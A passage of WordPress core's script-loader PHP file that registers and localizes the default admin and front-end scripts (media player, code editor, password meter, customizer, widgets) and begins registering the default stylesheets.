'mejs.volume-slider' => __( 'Volume Slider' ),
'mejs.video-player' => __( 'Video Player' ),
'mejs.audio-player' => __( 'Audio Player' ),
'mejs.captions-subtitles' => __( 'Captions/Subtitles' ),
'mejs.captions-chapters' => __( 'Chapters' ),
'mejs.none' => __( 'None' ),
'mejs.afrikaans' => __( 'Afrikaans' ),
'mejs.albanian' => __( 'Albanian' ),
'mejs.arabic' => __( 'Arabic' ),
'mejs.belarusian' => __( 'Belarusian' ),
'mejs.bulgarian' => __( 'Bulgarian' ),
'mejs.catalan' => __( 'Catalan' ),
'mejs.chinese' => __( 'Chinese' ),
'mejs.chinese-simplified' => __( 'Chinese (Simplified)' ),
'mejs.chinese-traditional' => __( 'Chinese (Traditional)' ),
'mejs.croatian' => __( 'Croatian' ),
'mejs.czech' => __( 'Czech' ),
'mejs.danish' => __( 'Danish' ),
'mejs.dutch' => __( 'Dutch' ),
'mejs.english' => __( 'English' ),
'mejs.estonian' => __( 'Estonian' ),
'mejs.filipino' => __( 'Filipino' ),
'mejs.finnish' => __( 'Finnish' ),
'mejs.french' => __( 'French' ),
'mejs.galician' => __( 'Galician' ),
'mejs.german' => __( 'German' ),
'mejs.greek' => __( 'Greek' ),
'mejs.haitian-creole' => __( 'Haitian Creole' ),
'mejs.hebrew' => __( 'Hebrew' ),
'mejs.hindi' => __( 'Hindi' ),
'mejs.hungarian' => __( 'Hungarian' ),
'mejs.icelandic' => __( 'Icelandic' ),
'mejs.indonesian' => __( 'Indonesian' ),
'mejs.irish' => __( 'Irish' ),
'mejs.italian' => __( 'Italian' ),
'mejs.japanese' => __( 'Japanese' ),
'mejs.korean' => __( 'Korean' ),
'mejs.latvian' => __( 'Latvian' ),
'mejs.lithuanian' => __( 'Lithuanian' ),
'mejs.macedonian' => __( 'Macedonian' ),
'mejs.malay' => __( 'Malay' ),
'mejs.maltese' => __( 'Maltese' ),
'mejs.norwegian' => __( 'Norwegian' ),
'mejs.persian' => __( 'Persian' ),
'mejs.polish' => __( 'Polish' ),
'mejs.portuguese' => __( 'Portuguese' ),
'mejs.romanian' => __( 'Romanian' ),
'mejs.russian' => __( 'Russian' ),
'mejs.serbian' => __( 'Serbian' ),
'mejs.slovak' => __( 'Slovak' ),
'mejs.slovenian' => __( 'Slovenian' ),
'mejs.spanish' => __( 'Spanish' ),
'mejs.swahili' => __( 'Swahili' ),
'mejs.swedish' => __( 'Swedish' ),
'mejs.tagalog' => __( 'Tagalog' ),
'mejs.thai' => __( 'Thai' ),
'mejs.turkish' => __( 'Turkish' ),
'mejs.ukrainian' => __( 'Ukrainian' ),
'mejs.vietnamese' => __( 'Vietnamese' ),
'mejs.welsh' => __( 'Welsh' ),
'mejs.yiddish' => __( 'Yiddish' ),
),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
)
),
'before'
);
$scripts->add( 'mediaelement-vimeo', '/wp-includes/js/mediaelement/renderers/vimeo.min.js', array( 'mediaelement' ), '4.2.17', 1 );
$scripts->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.js", array( 'mediaelement' ), false, 1 );
$mejs_settings = array(
'pluginPath' => includes_url( 'js/mediaelement/', 'relative' ),
'classPrefix' => 'mejs-',
'stretching' => 'responsive',
/** This filter is documented in wp-includes/media.php */
'audioShortcodeLibrary' => apply_filters( 'wp_audio_shortcode_library', 'mediaelement' ),
/** This filter is documented in wp-includes/media.php */
'videoShortcodeLibrary' => apply_filters( 'wp_video_shortcode_library', 'mediaelement' ),
);
did_action( 'init' ) && $scripts->localize(
'mediaelement',
'_wpmejsSettings',
/**
* Filters the MediaElement configuration settings.
*
* @since 4.4.0
*
* @param array $mejs_settings MediaElement settings array.
*/
apply_filters( 'mejs_settings', $mejs_settings )
);
$scripts->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.js', array(), '5.29.1-alpha-ee20357' );
$scripts->add( 'csslint', '/wp-includes/js/codemirror/csslint.js', array(), '1.0.5' );
$scripts->add( 'esprima', '/wp-includes/js/codemirror/esprima.js', array(), '4.0.0' );
$scripts->add( 'jshint', '/wp-includes/js/codemirror/fakejshint.js', array( 'esprima' ), '2.9.5' );
$scripts->add( 'jsonlint', '/wp-includes/js/codemirror/jsonlint.js', array(), '1.6.2' );
$scripts->add( 'htmlhint', '/wp-includes/js/codemirror/htmlhint.js', array(), '0.9.14-xwp' );
$scripts->add( 'htmlhint-kses', '/wp-includes/js/codemirror/htmlhint-kses.js', array( 'htmlhint' ) );
$scripts->add( 'code-editor', "/wp-admin/js/code-editor$suffix.js", array( 'jquery', 'wp-codemirror', 'underscore' ) );
$scripts->add( 'wp-theme-plugin-editor', "/wp-admin/js/theme-plugin-editor$suffix.js", array( 'common', 'wp-util', 'wp-sanitize', 'jquery', 'jquery-ui-core', 'wp-a11y', 'underscore' ), false, 1 );
$scripts->set_translations( 'wp-theme-plugin-editor' );
$scripts->add( 'wp-playlist', "/wp-includes/js/mediaelement/wp-playlist$suffix.js", array( 'wp-util', 'backbone', 'mediaelement' ), false, 1 );
$scripts->add( 'zxcvbn-async', "/wp-includes/js/zxcvbn-async$suffix.js", array(), '1.0' );
did_action( 'init' ) && $scripts->localize(
'zxcvbn-async',
'_zxcvbnSettings',
array(
'src' => empty( $guessed_url ) ? includes_url( '/js/zxcvbn.min.js' ) : $scripts->base_url . '/wp-includes/js/zxcvbn.min.js',
)
);
$scripts->add( 'password-strength-meter', "/wp-admin/js/password-strength-meter$suffix.js", array( 'jquery', 'zxcvbn-async' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'password-strength-meter',
'pwsL10n',
array(
'unknown' => _x( 'Password strength unknown', 'password strength' ),
'short' => _x( 'Very weak', 'password strength' ),
'bad' => _x( 'Weak', 'password strength' ),
'good' => _x( 'Medium', 'password strength' ),
'strong' => _x( 'Strong', 'password strength' ),
'mismatch' => _x( 'Mismatch', 'password mismatch' ),
)
);
$scripts->set_translations( 'password-strength-meter' );
$scripts->add( 'password-toggle', "/wp-admin/js/password-toggle$suffix.js", array(), false, 1 );
$scripts->set_translations( 'password-toggle' );
$scripts->add( 'application-passwords', "/wp-admin/js/application-passwords$suffix.js", array( 'jquery', 'wp-util', 'wp-api-request', 'wp-date', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'application-passwords' );
$scripts->add( 'auth-app', "/wp-admin/js/auth-app$suffix.js", array( 'jquery', 'wp-api-request', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'auth-app' );
$scripts->add( 'user-profile', "/wp-admin/js/user-profile$suffix.js", array( 'clipboard', 'jquery', 'password-strength-meter', 'wp-util', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'user-profile' );
$user_id = isset( $_GET['user_id'] ) ? (int) $_GET['user_id'] : 0;
did_action( 'init' ) && $scripts->localize(
'user-profile',
'userProfileL10n',
array(
'user_id' => $user_id,
'nonce' => wp_installing() ? '' : wp_create_nonce( 'reset-password-for-' . $user_id ),
)
);
$scripts->add( 'language-chooser', "/wp-admin/js/language-chooser$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'user-suggest', "/wp-admin/js/user-suggest$suffix.js", array( 'jquery-ui-autocomplete' ), false, 1 );
$scripts->add( 'admin-bar', "/wp-includes/js/admin-bar$suffix.js", array( 'hoverintent-js' ), false, 1 );
$scripts->add( 'wplink', "/wp-includes/js/wplink$suffix.js", array( 'common', 'jquery', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'wplink' );
did_action( 'init' ) && $scripts->localize(
'wplink',
'wpLinkL10n',
array(
'title' => __( 'Insert/edit link' ),
'update' => __( 'Update' ),
'save' => __( 'Add Link' ),
'noTitle' => __( '(no title)' ),
'noMatchesFound' => __( 'No results found.' ),
'linkSelected' => __( 'Link selected.' ),
'linkInserted' => __( 'Link inserted.' ),
/* translators: Minimum input length in characters to start searching posts in the "Insert/edit link" modal. */
'minInputLength' => (int) _x( '3', 'minimum input length for searching post links' ),
)
);
$scripts->add( 'wpdialogs', "/wp-includes/js/wpdialog$suffix.js", array( 'jquery-ui-dialog' ), false, 1 );
$scripts->add( 'word-count', "/wp-admin/js/word-count$suffix.js", array(), false, 1 );
$scripts->add( 'media-upload', "/wp-admin/js/media-upload$suffix.js", array( 'thickbox', 'shortcode' ), false, 1 );
$scripts->add( 'hoverIntent', "/wp-includes/js/hoverIntent$suffix.js", array( 'jquery' ), '1.10.2', 1 );
// JS-only version of hoverintent (no dependencies).
$scripts->add( 'hoverintent-js', '/wp-includes/js/hoverintent-js.min.js', array(), '2.2.1', 1 );
$scripts->add( 'customize-base', "/wp-includes/js/customize-base$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'customize-loader', "/wp-includes/js/customize-loader$suffix.js", array( 'customize-base' ), false, 1 );
$scripts->add( 'customize-preview', "/wp-includes/js/customize-preview$suffix.js", array( 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'customize-models', '/wp-includes/js/customize-models.js', array( 'underscore', 'backbone' ), false, 1 );
$scripts->add( 'customize-views', '/wp-includes/js/customize-views.js', array( 'jquery', 'underscore', 'imgareaselect', 'customize-models', 'media-editor', 'media-views' ), false, 1 );
$scripts->add( 'customize-controls', "/wp-admin/js/customize-controls$suffix.js", array( 'customize-base', 'wp-a11y', 'wp-util', 'jquery-ui-core' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'customize-controls',
'_wpCustomizeControlsL10n',
array(
'activate' => __( 'Activate & Publish' ),
'save' => __( 'Save & Publish' ), // @todo Remove as not required.
'publish' => __( 'Publish' ),
'published' => __( 'Published' ),
'saveDraft' => __( 'Save Draft' ),
'draftSaved' => __( 'Draft Saved' ),
'updating' => __( 'Updating' ),
'schedule' => _x( 'Schedule', 'customizer changeset action/button label' ),
'scheduled' => _x( 'Scheduled', 'customizer changeset status' ),
'invalid' => __( 'Invalid' ),
'saveBeforeShare' => __( 'Please save your changes in order to share the preview.' ),
'futureDateError' => __( 'You must supply a future date to schedule.' ),
'saveAlert' => __( 'The changes you made will be lost if you navigate away from this page.' ),
'saved' => __( 'Saved' ),
'cancel' => __( 'Cancel' ),
'close' => __( 'Close' ),
'action' => __( 'Action' ),
'discardChanges' => __( 'Discard changes' ),
'cheatin' => __( 'An error occurred. Please try again later.' ),
'notAllowedHeading' => __( 'You need a higher level of permission.' ),
'notAllowed' => __( 'Sorry, you are not allowed to customize this site.' ),
'previewIframeTitle' => __( 'Site Preview' ),
'loginIframeTitle' => __( 'Session expired' ),
'collapseSidebar' => _x( 'Hide Controls', 'label for hide controls button without length constraints' ),
'expandSidebar' => _x( 'Show Controls', 'label for hide controls button without length constraints' ),
'untitledBlogName' => __( '(Untitled)' ),
'unknownRequestFail' => __( 'Looks like something’s gone wrong. Wait a couple seconds, and then try again.' ),
'themeDownloading' => __( 'Downloading your new theme…' ),
'themePreviewWait' => __( 'Setting up your live preview. This may take a bit.' ),
'revertingChanges' => __( 'Reverting unpublished changes…' ),
'trashConfirm' => __( 'Are you sure you want to discard your unpublished changes?' ),
/* translators: %s: Display name of the user who has taken over the changeset in customizer. */
'takenOverMessage' => __( '%s has taken over and is currently customizing.' ),
/* translators: %s: URL to the Customizer to load the autosaved version. */
'autosaveNotice' => __( 'There is a more recent autosave of your changes than the one you are previewing. <a href="%s">Restore the autosave</a>' ),
'videoHeaderNotice' => __( 'This theme does not support video headers on this page. Navigate to the front page or another page that supports video headers.' ),
// Used for overriding the file types allowed in Plupload.
'allowedFiles' => __( 'Allowed Files' ),
'customCssError' => array(
/* translators: %d: Error count. */
'singular' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 1 ),
/* translators: %d: Error count. */
'plural' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'pageOnFrontError' => __( 'Homepage and posts page must be different.' ),
'saveBlockedError' => array(
/* translators: %s: Number of invalid settings. */
'singular' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 1 ),
/* translators: %s: Number of invalid settings. */
'plural' => _n( 'Unable to save due to %s invalid setting.', 'Unable to save due to %s invalid settings.', 2 ),
// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
),
'scheduleDescription' => __( 'Schedule your customization changes to publish ("go live") at a future date.' ),
'themePreviewUnavailable' => __( 'Sorry, you cannot preview new themes when you have changes scheduled or saved as a draft. Please publish your changes, or wait until they publish to preview new themes.' ),
'themeInstallUnavailable' => sprintf(
/* translators: %s: URL to Add Themes admin screen. */
__( 'You will not be able to install new themes from here yet since your install requires SFTP credentials. For now, please <a href="%s">add themes in the admin</a>.' ),
esc_url( admin_url( 'theme-install.php' ) )
),
'publishSettings' => __( 'Publish Settings' ),
'invalidDate' => __( 'Invalid date.' ),
'invalidValue' => __( 'Invalid value.' ),
'blockThemeNotification' => sprintf(
/* translators: 1: Link to Site Editor documentation on HelpHub, 2: HTML button. */
__( 'Hurray! Your theme supports site editing with blocks. <a href="%1$s">Tell me more</a>. %2$s' ),
__( 'https://wordpress.org/documentation/article/site-editor/' ),
sprintf(
'<button type="button" data-action="%1$s" class="button switch-to-editor">%2$s</button>',
esc_url( admin_url( 'site-editor.php' ) ),
__( 'Use Site Editor' )
)
),
)
);
$scripts->add( 'customize-selective-refresh', "/wp-includes/js/customize-selective-refresh$suffix.js", array( 'jquery', 'wp-util', 'customize-preview' ), false, 1 );
$scripts->add( 'customize-widgets', "/wp-admin/js/customize-widgets$suffix.js", array( 'jquery', 'jquery-ui-sortable', 'jquery-ui-droppable', 'wp-backbone', 'customize-controls' ), false, 1 );
$scripts->add( 'customize-preview-widgets', "/wp-includes/js/customize-preview-widgets$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'customize-nav-menus', "/wp-admin/js/customize-nav-menus$suffix.js", array( 'jquery', 'wp-backbone', 'customize-controls', 'accordion', 'nav-menu', 'wp-sanitize' ), false, 1 );
$scripts->add( 'customize-preview-nav-menus', "/wp-includes/js/customize-preview-nav-menus$suffix.js", array( 'jquery', 'wp-util', 'customize-preview', 'customize-selective-refresh' ), false, 1 );
$scripts->add( 'wp-custom-header', "/wp-includes/js/wp-custom-header$suffix.js", array( 'wp-a11y' ), false, 1 );
$scripts->add( 'accordion', "/wp-admin/js/accordion$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'shortcode', "/wp-includes/js/shortcode$suffix.js", array( 'underscore' ), false, 1 );
$scripts->add( 'media-models', "/wp-includes/js/media-models$suffix.js", array( 'wp-backbone' ), false, 1 );
did_action( 'init' ) && $scripts->localize(
'media-models',
'_wpMediaModelsL10n',
array(
'settings' => array(
'ajaxurl' => admin_url( 'admin-ajax.php', 'relative' ),
'post' => array( 'id' => 0 ),
),
)
);
$scripts->add( 'wp-embed', "/wp-includes/js/wp-embed$suffix.js" );
did_action( 'init' ) && $scripts->add_data( 'wp-embed', 'strategy', 'defer' );
/*
* To enqueue media-views or media-editor, call wp_enqueue_media().
* Both rely on numerous settings, styles, and templates to operate correctly.
*/
$scripts->add( 'media-views', "/wp-includes/js/media-views$suffix.js", array( 'utils', 'media-models', 'wp-plupload', 'jquery-ui-sortable', 'wp-mediaelement', 'wp-api-request', 'wp-a11y', 'clipboard' ), false, 1 );
$scripts->set_translations( 'media-views' );
$scripts->add( 'media-editor', "/wp-includes/js/media-editor$suffix.js", array( 'shortcode', 'media-views' ), false, 1 );
$scripts->set_translations( 'media-editor' );
$scripts->add( 'media-audiovideo', "/wp-includes/js/media-audiovideo$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'mce-view', "/wp-includes/js/mce-view$suffix.js", array( 'shortcode', 'jquery', 'media-views', 'media-audiovideo' ), false, 1 );
$scripts->add( 'wp-api', "/wp-includes/js/wp-api$suffix.js", array( 'jquery', 'backbone', 'underscore', 'wp-api-request' ), false, 1 );
if ( is_admin() ) {
$scripts->add( 'admin-tags', "/wp-admin/js/tags$suffix.js", array( 'jquery', 'wp-ajax-response' ), false, 1 );
$scripts->set_translations( 'admin-tags' );
$scripts->add( 'admin-comments', "/wp-admin/js/edit-comments$suffix.js", array( 'wp-lists', 'quicktags', 'jquery-query', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-comments' );
did_action( 'init' ) && $scripts->localize(
'admin-comments',
'adminCommentsSettings',
array(
'hotkeys_highlight_first' => isset( $_GET['hotkeys_highlight_first'] ),
'hotkeys_highlight_last' => isset( $_GET['hotkeys_highlight_last'] ),
)
);
$scripts->add( 'xfn', "/wp-admin/js/xfn$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'postbox', "/wp-admin/js/postbox$suffix.js", array( 'jquery-ui-sortable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'postbox' );
$scripts->add( 'tags-box', "/wp-admin/js/tags-box$suffix.js", array( 'jquery', 'tags-suggest' ), false, 1 );
$scripts->set_translations( 'tags-box' );
$scripts->add( 'tags-suggest', "/wp-admin/js/tags-suggest$suffix.js", array( 'common', 'jquery-ui-autocomplete', 'wp-a11y', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'tags-suggest' );
$scripts->add( 'post', "/wp-admin/js/post$suffix.js", array( 'suggest', 'wp-lists', 'postbox', 'tags-box', 'underscore', 'word-count', 'wp-a11y', 'wp-sanitize', 'clipboard' ), false, 1 );
$scripts->set_translations( 'post' );
$scripts->add( 'editor-expand', "/wp-admin/js/editor-expand$suffix.js", array( 'jquery', 'underscore' ), false, 1 );
$scripts->add( 'link', "/wp-admin/js/link$suffix.js", array( 'wp-lists', 'postbox' ), false, 1 );
$scripts->add( 'comment', "/wp-admin/js/comment$suffix.js", array( 'jquery', 'postbox' ), false, 1 );
$scripts->set_translations( 'comment' );
$scripts->add( 'admin-gallery', "/wp-admin/js/gallery$suffix.js", array( 'jquery-ui-sortable' ) );
$scripts->add( 'admin-widgets', "/wp-admin/js/widgets$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'admin-widgets' );
$scripts->add( 'media-widgets', "/wp-admin/js/widgets/media-widgets$suffix.js", array( 'jquery', 'media-models', 'media-views', 'wp-api-request' ) );
$scripts->add_inline_script( 'media-widgets', 'wp.mediaWidgets.init();', 'after' );
$scripts->add( 'media-audio-widget', "/wp-admin/js/widgets/media-audio-widget$suffix.js", array( 'media-widgets', 'media-audiovideo' ) );
$scripts->add( 'media-image-widget', "/wp-admin/js/widgets/media-image-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-gallery-widget', "/wp-admin/js/widgets/media-gallery-widget$suffix.js", array( 'media-widgets' ) );
$scripts->add( 'media-video-widget', "/wp-admin/js/widgets/media-video-widget$suffix.js", array( 'media-widgets', 'media-audiovideo', 'wp-api-request' ) );
$scripts->add( 'text-widgets', "/wp-admin/js/widgets/text-widgets$suffix.js", array( 'jquery', 'backbone', 'editor', 'wp-util', 'wp-a11y' ) );
$scripts->add( 'custom-html-widgets', "/wp-admin/js/widgets/custom-html-widgets$suffix.js", array( 'jquery', 'backbone', 'wp-util', 'jquery-ui-core', 'wp-a11y' ) );
$scripts->add( 'theme', "/wp-admin/js/theme$suffix.js", array( 'wp-backbone', 'wp-a11y', 'customize-base' ), false, 1 );
$scripts->add( 'inline-edit-post', "/wp-admin/js/inline-edit-post$suffix.js", array( 'jquery', 'tags-suggest', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-post' );
$scripts->add( 'inline-edit-tax', "/wp-admin/js/inline-edit-tax$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'inline-edit-tax' );
$scripts->add( 'plugin-install', "/wp-admin/js/plugin-install$suffix.js", array( 'jquery', 'jquery-ui-core', 'thickbox' ), false, 1 );
$scripts->set_translations( 'plugin-install' );
$scripts->add( 'site-health', "/wp-admin/js/site-health$suffix.js", array( 'clipboard', 'jquery', 'wp-util', 'wp-a11y', 'wp-api-request', 'wp-url', 'wp-i18n', 'wp-hooks' ), false, 1 );
$scripts->set_translations( 'site-health' );
$scripts->add( 'privacy-tools', "/wp-admin/js/privacy-tools$suffix.js", array( 'jquery', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'privacy-tools' );
$scripts->add( 'updates', "/wp-admin/js/updates$suffix.js", array( 'common', 'jquery', 'wp-util', 'wp-a11y', 'wp-sanitize', 'wp-i18n' ), false, 1 );
$scripts->set_translations( 'updates' );
did_action( 'init' ) && $scripts->localize(
'updates',
'_wpUpdatesSettings',
array(
'ajax_nonce' => wp_installing() ? '' : wp_create_nonce( 'updates' ),
)
);
$scripts->add( 'farbtastic', '/wp-admin/js/farbtastic.js', array( 'jquery' ), '1.2' );
$scripts->add( 'iris', '/wp-admin/js/iris.min.js', array( 'jquery-ui-draggable', 'jquery-ui-slider', 'jquery-touch-punch' ), '1.1.1', 1 );
$scripts->add( 'wp-color-picker', "/wp-admin/js/color-picker$suffix.js", array( 'iris' ), false, 1 );
$scripts->set_translations( 'wp-color-picker' );
$scripts->add( 'dashboard', "/wp-admin/js/dashboard$suffix.js", array( 'common', 'jquery', 'admin-comments', 'postbox', 'wp-util', 'wp-a11y', 'wp-date' ), false, 1 );
$scripts->set_translations( 'dashboard' );
$scripts->add( 'list-revisions', "/wp-includes/js/wp-list-revisions$suffix.js" );
$scripts->add( 'media-grid', "/wp-includes/js/media-grid$suffix.js", array( 'media-editor' ), false, 1 );
$scripts->add( 'media', "/wp-admin/js/media$suffix.js", array( 'jquery', 'clipboard', 'wp-i18n', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'media' );
$scripts->add( 'image-edit', "/wp-admin/js/image-edit$suffix.js", array( 'jquery', 'jquery-ui-core', 'imgareaselect', 'wp-a11y' ), false, 1 );
$scripts->set_translations( 'image-edit' );
$scripts->add( 'set-post-thumbnail', "/wp-admin/js/set-post-thumbnail$suffix.js", array( 'jquery' ), false, 1 );
$scripts->set_translations( 'set-post-thumbnail' );
/*
* Navigation Menus: Adding underscore as a dependency to utilize _.debounce
* see https://core.trac.wordpress.org/ticket/42321
*/
$scripts->add( 'nav-menu', "/wp-admin/js/nav-menu$suffix.js", array( 'jquery-ui-sortable', 'jquery-ui-draggable', 'jquery-ui-droppable', 'wp-lists', 'postbox', 'underscore' ) );
$scripts->set_translations( 'nav-menu' );
$scripts->add( 'custom-header', '/wp-admin/js/custom-header.js', array( 'jquery-masonry' ), false, 1 );
$scripts->add( 'custom-background', "/wp-admin/js/custom-background$suffix.js", array( 'wp-color-picker', 'media-views' ), false, 1 );
$scripts->add( 'media-gallery', "/wp-admin/js/media-gallery$suffix.js", array( 'jquery' ), false, 1 );
$scripts->add( 'svg-painter', '/wp-admin/js/svg-painter.js', array( 'jquery' ), false, 1 );
}
}
/**
* Assigns default styles to $styles object.
*
* Nothing is returned, because the $styles parameter is passed by reference.
* Meaning that whatever object is passed will be updated without having to
* reassign the variable that was passed back to the same value. This saves
* memory.
*
* Adding default styles is not the only task, it also assigns the base_url
* property, the default version, and text direction for the object.
*
* @since 2.6.0
*
* @global array $editor_styles
*
* @param WP_Styles $styles
*/
function wp_default_styles( $styles ) {
global $editor_styles;
/*
* Include an unmodified $wp_version.
*
* Note: wp_get_wp_version() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* wp-includes/functions.php is not loaded.
*/
require ABSPATH . WPINC . '/version.php';
if ( ! defined( 'SCRIPT_DEBUG' ) ) {
/*
* Note: str_contains() is not used here, as this file can be included
* via wp-admin/load-scripts.php or wp-admin/load-styles.php, in which case
* the polyfills from wp-includes/compat.php are not loaded.
*/
define( 'SCRIPT_DEBUG', false !== strpos( $wp_version, '-src' ) );
}
$guessurl = site_url();
if ( ! $guessurl ) {
$guessurl = wp_guess_url();
}
$styles->base_url = $guessurl;
$styles->content_url = defined( 'WP_CONTENT_URL' ) ? WP_CONTENT_URL : '';
$styles->default_version = get_bloginfo( 'version' );
$styles->text_direction = function_exists( 'is_rtl' ) && is_rtl() ? 'rtl' : 'ltr';
$styles->default_dirs = array( '/wp-admin/', '/wp-includes/css/' );
// Open Sans is no longer used by core, but may be relied upon by themes and plugins.
$open_sans_font_url = '';
/*
* translators: If there are characters in your language that are not supported
* by Open Sans, translate this to 'off'. Do not translate into your own language.
*/
if ( 'off' !== _x( 'on', 'Open Sans font: on or off' ) ) {
$subsets = 'latin,latin-ext';
/*
* translators: To add an additional Open Sans character subset specific to your language,
* translate this to 'greek', 'cyrillic' or 'vietnamese'. Do not translate into your own language.
*/
$subset = _x( 'no-subset', 'Open Sans font: add new subset (greek, cyrillic, vietnamese)' );
if ( 'cyrillic' === $subset ) {
$subsets .= ',cyrillic,cyrillic-ext';
} elseif ( 'greek' === $subset ) {
$subsets .= ',greek,greek-ext';
} elseif ( 'vietnamese' === $subset ) {
$subsets .= ',vietnamese';
}
// Hotlink Open Sans, for now.
$open_sans_font_url = "https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,300,400,600&subset=$subsets&display=fallback";
}
// Register a stylesheet for the selected admin color scheme.
$styles->add( 'colors', true, array( 'wp-admin', 'buttons' ) );
$suffix = SCRIPT_DEBUG ? '' : '.min';
// Admin CSS.
$styles->add( 'common', "/wp-admin/css/common$suffix.css" );
$styles->add( 'forms', "/wp-admin/css/forms$suffix.css" );
$styles->add( 'admin-menu', "/wp-admin/css/admin-menu$suffix.css" );
$styles->add( 'dashboard', "/wp-admin/css/dashboard$suffix.css" );
$styles->add( 'list-tables', "/wp-admin/css/list-tables$suffix.css" );
$styles->add( 'edit', "/wp-admin/css/edit$suffix.css" );
$styles->add( 'revisions', "/wp-admin/css/revisions$suffix.css" );
$styles->add( 'media', "/wp-admin/css/media$suffix.css" );
$styles->add( 'themes', "/wp-admin/css/themes$suffix.css" );
$styles->add( 'about', "/wp-admin/css/about$suffix.css" );
$styles->add( 'nav-menus', "/wp-admin/css/nav-menus$suffix.css" );
$styles->add( 'widgets', "/wp-admin/css/widgets$suffix.css", array( 'wp-pointer' ) );
$styles->add( 'site-icon', "/wp-admin/css/site-icon$suffix.css" );
$styles->add( 'l10n', "/wp-admin/css/l10n$suffix.css" );
$styles->add( 'code-editor', "/wp-admin/css/code-editor$suffix.css", array( 'wp-codemirror' ) );
$styles->add( 'site-health', "/wp-admin/css/site-health$suffix.css" );
$styles->add( 'wp-admin', false, array( 'dashicons', 'common', 'forms', 'admin-menu', 'dashboard', 'list-tables', 'edit', 'revisions', 'media', 'themes', 'about', 'nav-menus', 'widgets', 'site-icon', 'l10n' ) );
$styles->add( 'login', "/wp-admin/css/login$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'install', "/wp-admin/css/install$suffix.css", array( 'dashicons', 'buttons', 'forms', 'l10n' ) );
$styles->add( 'wp-color-picker', "/wp-admin/css/color-picker$suffix.css" );
$styles->add( 'customize-controls', "/wp-admin/css/customize-controls$suffix.css", array( 'wp-admin', 'colors', 'imgareaselect' ) );
$styles->add( 'customize-widgets', "/wp-admin/css/customize-widgets$suffix.css", array( 'wp-admin', 'colors' ) );
$styles->add( 'customize-nav-menus', "/wp-admin/css/customize-nav-menus$suffix.css", array( 'wp-admin', 'colors' ) );
// Common dependencies.
$styles->add( 'buttons', "/wp-includes/css/buttons$suffix.css" );
$styles->add( 'dashicons', "/wp-includes/css/dashicons$suffix.css" );
// Includes CSS.
$styles->add( 'admin-bar', "/wp-includes/css/admin-bar$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-auth-check', "/wp-includes/css/wp-auth-check$suffix.css", array( 'dashicons' ) );
$styles->add( 'editor-buttons', "/wp-includes/css/editor$suffix.css", array( 'dashicons' ) );
$styles->add( 'media-views', "/wp-includes/css/media-views$suffix.css", array( 'buttons', 'dashicons', 'wp-mediaelement' ) );
$styles->add( 'wp-pointer', "/wp-includes/css/wp-pointer$suffix.css", array( 'dashicons' ) );
$styles->add( 'customize-preview', "/wp-includes/css/customize-preview$suffix.css", array( 'dashicons' ) );
$styles->add( 'wp-empty-template-alert', "/wp-includes/css/wp-empty-template-alert$suffix.css" );
// External libraries and friends.
$styles->add( 'imgareaselect', '/wp-includes/js/imgareaselect/imgareaselect.css', array(), '0.9.8' );
$styles->add( 'wp-jquery-ui-dialog', "/wp-includes/css/jquery-ui-dialog$suffix.css", array( 'dashicons' ) );
$styles->add( 'mediaelement', '/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css', array(), '4.2.17' );
$styles->add( 'wp-mediaelement', "/wp-includes/js/mediaelement/wp-mediaelement$suffix.css", array( 'mediaelement' ) );
$styles->add( 'thickbox', '/wp-includes/js/thickbox/thickbox.css', array( 'dashicons' ) );
$styles->add( 'wp-codemirror', '/wp-includes/js/codemirror/codemirror.min.css', array(), '5.29.1-alpha-ee20357' );
// Deprecated CSS.
$styles->add( 'deprecated-media', "/wp-admin/css/deprecated-media$suffix.css" );
$styles->add( 'farbtastic', "/wp-admin/css/farbtastic$suffix.css", array(), '1.3u1' );
$styles->add( 'jcrop', '/wp-includes/js/jcrop/jquery.Jcrop.min.css', array(), '0.9.15' );
$styles->add( 'colors-fresh', false, array( 'wp-admin', 'buttons' ) ); // Old handle.
$styles->add( 'open-sans', $open_sans_font_url ); // No longer used in core as of 4.6.
$styles->add( 'wp-embed-template-ie', false );
$styles->add_data( 'wp-embed-template-ie', 'conditional', '_required-conditional-dependency_' );
// Noto Serif is no longer used by core, but may be relied upon by themes and plugins.
